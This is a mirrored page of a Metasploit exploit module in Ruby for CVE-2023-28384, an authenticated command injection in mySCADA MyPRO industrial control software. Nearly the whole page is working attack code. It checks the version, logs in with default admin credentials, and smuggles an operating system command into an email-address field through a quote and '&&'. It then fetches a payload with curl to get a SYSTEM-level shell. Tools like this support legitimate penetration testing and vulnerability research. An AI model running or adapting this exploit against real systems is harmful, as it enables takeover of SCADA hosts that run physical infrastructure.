CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/mypro_cmdexe.rb
Views: 1904
1
class MetasploitModule < Msf::Exploit::Remote

2
  Rank = ExcellentRanking

3
  include Msf::Exploit::Remote::HttpClient

4
  prepend Msf::Exploit::Remote::AutoCheck

5


6
  def initialize(info = {})

7
    super(

8
      update_info(

9
        info,

10
        'Name' => 'mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)',

11
        'Description' => %q{

12
          Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.

13
          The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.

14
        },

15
        'License' => MSF_LICENSE,

16
        'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module

17
        'References' => [

18
          [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06'],

19
          [ 'CVE', '2023-28384']

20
        ],

21
        'DisclosureDate' => '2022-09-22',

22
        'Platform' => 'win',

23
        'Arch' => [ ARCH_CMD ],

24
        'Targets' => [

25
          [

26
            'Windows_Fetch',

27
            {

28
              'Arch' => [ ARCH_CMD ],

29
              'Platform' => 'win',

30
              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },

31
              'Type' => :win_fetch

32
            }

33
          ]

34
        ],

35
        'DefaultTarget' => 0,

36


37
        'Notes' => {

38
          'Stability' => [CRASH_SAFE],

39
          'Reliability' => [REPEATABLE_SESSION],

40
          'SideEffects' => [IOC_IN_LOGS]

41
        }

42
      )

43
    )

44


45
    register_options(

46
      [

47
        OptString.new(

48
          'USERNAME',

49
          [ true, 'The username to authenticate with (default: admin)', 'admin' ]

50
        ),

51
        OptString.new(

52
          'PASSWORD',

53
          [ true, 'The password to authenticate with (default: admin)', 'admin' ]

54
        ),

55
        OptString.new(

56
          'TARGETURI',

57
          [ true, 'The URI for the MyPRO web interface', '/' ]

58
        )

59
      ]

60
    )

61
  end

62


63
  # Determine if the MyPRO instance runs a vulnerable version

64
  def check

65
    begin

66
      res = send_request_cgi({

67
        'method' => 'POST',

68
        'uri' => normalize_uri(target_uri.path, 'l.fcgi'),

69
        'vars_post' => {

70
          't' => '98'

71
        }

72
      })

73
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError

74
      return CheckCode::Unknown

75
    end

76


77
    if res && res.code == 200

78
      data = res.get_json_document

79
      version = data['V']

80
      if version.nil?

81
        return CheckCode::Unknown

82
      else

83
        vprint_status('Version retrieved: ' + version)

84
      end

85


86
      if Rex::Version.new(version) <= Rex::Version.new('8.28')

87
        return CheckCode::Appears

88
      else

89
        return CheckCode::Safe

90
      end

91
    else

92
      return CheckCode::Unknown

93
    end

94
  end

95


96
  def exploit

97
    execute_command(payload.encoded)

98
  end

99


100
  def execute_command(cmd)

101
    print_status('Checking credentials...')

102
    check_auth

103
    print_status('Sending command injection...')

104
    exec_mypro(cmd)

105
    print_status('Exploit finished, check thy shell.')

106
  end

107


108
  # Check if credentials are working

109
  def check_auth

110
    res = send_request_cgi({

111
      'method' => 'GET',

112
      'uri' => normalize_uri(target_uri.path, 'sss2'),

113
      'headers' => {

114
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

115
      }

116
    })

117


118
    unless res

119
      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')

120
    end

121
    case res.code

122
    when 200

123
      print_good('Credentials are working.')

124
    when 401

125
      fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')

126
    else

127
      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')

128
    end

129
  end

130


131
  # Send command injection

132
  def exec_mypro(cmd)

133
    post_data = {

134
      'type' => 'sendEmail',

135
      'addr' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com\"&&#{cmd}"

136
    }

137
    post_json = JSON.generate(post_data)

138


139
    res = send_request_cgi({

140
      'method' => 'POST',

141
      'ctype' => 'application/json',

142
      'data' => post_json,

143
      'uri' => normalize_uri(target_uri.path, 'sss2'),

144
      'headers' => {

145
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

146
      }

147


148
    })

149


150
    # We don't fail if no response is received, as the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response.

151


152
    if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned.

153
      print_good('Command successfully executed, check your shell.')

154
    end

155
  end

156


157
end

158


159